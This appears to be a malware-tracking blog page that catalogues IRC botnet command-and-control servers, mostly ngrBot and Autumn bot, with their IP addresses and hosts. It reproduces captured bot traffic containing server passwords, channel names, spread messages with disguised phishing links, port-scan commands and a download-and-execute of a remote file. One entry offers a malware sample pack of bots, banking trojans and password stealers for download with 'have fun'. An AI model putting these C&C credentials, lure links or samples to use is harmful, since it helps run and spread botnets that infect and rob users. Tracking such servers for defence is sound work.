Remote Host Port Number 31.3.246.92 6667 NICK [LaZeR|USA|XP|gkisbi] USER bjrkxnykng “” “lol” :bjrkxnykng JOIN #Thanks PONG :Fbi.GoV hosting infos: http://whois.domaintools.com/31.3.246.92
x.update1001.biz(ngrBot hosted in France Paris Gandi)
x.update1001.biz DNS_TYPE_A 92.243.3.183 92.243.3.183:3327 PASS 0617 Nick: n{AT|XPa}njhaaxc Username: njhaaxc Server Pass: 0617 Joined Channel: ##up# with Password 0617 PRIVMSG ##up# :[HTTP]: Updated HTTP spread message to “hehehe! http://www.facebook.com.image331.tk/Photo-484829292.jpeg” NICK n{US|XPa}rhvfuvd USER rhvfuvd 0 0 :rhvfuvd JOIN ##up# 0617 PRIVMSG ##up# :[MSN]: Updated MSN spread interval to “3” PRIVMSG ##up# :[MSN]: Updated MSN spread messageRead more...
92.241.169.165(irc botnet hosted in Russian Federation Moscow Oao Webalta)
Remote Host Port Number 83.125.22.163 80 92.241.169.165 47221 NICK [N00_USA_XP_4629026] PRIVMSG [N00_USA_XP_4629P @ :scan; Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads. @ :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads. MODE #ms2 -ixRead more...
96.127.179.26(ngrBot hosted in United States Chicago Singlehop Inc)
Remote Host Port Number 199.15.234.7 80 70.38.98.236 80 96.127.179.26 1888 PASS strike PRIVMSG #XP :[d=”http://img102.herosh.com/2011/10/01/306960429.gif” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 NICK n{US|XPa}mwsbbkj USER mwsbbkj 0 0 :mwsbbkj JOIN #asdf strike JOIN #XP JOIN #US hosting infos: http://whois.domaintools.com/96.127.179.26
193.107.16.53(ngrBot hosted in Seychelles Ideal Solution Ltd)
Remote Host Port Number 161.132.8.83 80 199.15.234.7 80 193.107.16.53 1863 PASS ngrbot NICK n{US|XPa}metgnjg USER metgnjg 0 0 :metgnjg JOIN #sys ngrbot PRIVMSG #sys :[MSN]: Updated MSN spread interval to “8” PRIVMSG #sys :[MSN]: Updated MSN spread message to “mira 😀 http://j.mp/odJCfo?/53153268/tqyvvs/DSC340353.jpg” PRIVMSG #sys :[DNS]: Blocked 0 domain(s) – Redirected 45 domain(s) hosting infos: http://whois.domaintools.com/193.107.16.53
82.114.94.108(ngrBot hosted in Serbia Kujtesa Net Sh.p.k)
Remote Host Port Number 199.15.234.7 80 62.146.124.74 80 62.146.88.122 80 66.40.52.61 80 74.125.47.157 80 74.125.47.167 80 74.125.47.99 80 74.125.47.113 443 74.125.47.120 443 82.114.94.108 7000 PASS .. PRIVMSG #|n|# :[HTTP]: Updated HTTP spread message to “is this foto u send me lol http://bitly.com/oZVaUH?=www.facebook.com/images/2011 |” PRIVMSG #|n|# :[Visit]: Visited “http://www.risi-preshev.com” NICK n{US|XPa}wiinpps USER wiinpps 0 0 :wiinppsRead more...
110Mb Malware Samples
Included in this package phoenix bot sample,autumn bot,ngrbot et diferent trojans bankers passwd stealers etc have fun Download: http://adf.ly/2yECh
91.121.204.203(ngrBot hosted in France Ovh Systems)
Remote Host Port Number 199.15.234.7 80 83.233.33.6 80 91.121.204.203 7475 PASS secret NICK n{US|XPa}evnyvvc USER evnyvvc 0 0 :evnyvvc PONG :80096D0 JOIN ##n secret PRIVMSG ##n :[DNS]: Blocked 1310 domain(s) – Redirected 0 domain(s) hosting infos: http://whois.domaintools.com/91.121.204.203
irc.smd4free.info(Autumn bot hosted in United Kingdom Ovh Systems)
irc.smd4free.info DNS_TYPE_A 46.105.241.187 46.105.241.187:1338 Nick: [AUT-XP-x86]26275 Username: unreal Joined Channel: #autumn jellybeans exe file: http://adf.ly/2yADD hosting infos: http://whois.domaintools.com/46.105.241.187
salihweb.netirc botnet hosted in United Kingdom Redstation Limited)
Remote Host Port Number 199.15.234.7 80 31.3.224.246 7777 PASS secret 31.3.224.246 3030 PASS secret NICK New{US-XP-x86}4665444 USER 4665444 “” “4665444” :4665444 MODE New{US-XP-x86}4665444 +iMm JOIN #secret secret PONG :irc.priv8net.com hosting infos: http://whois.domaintools.com/31.3.224.246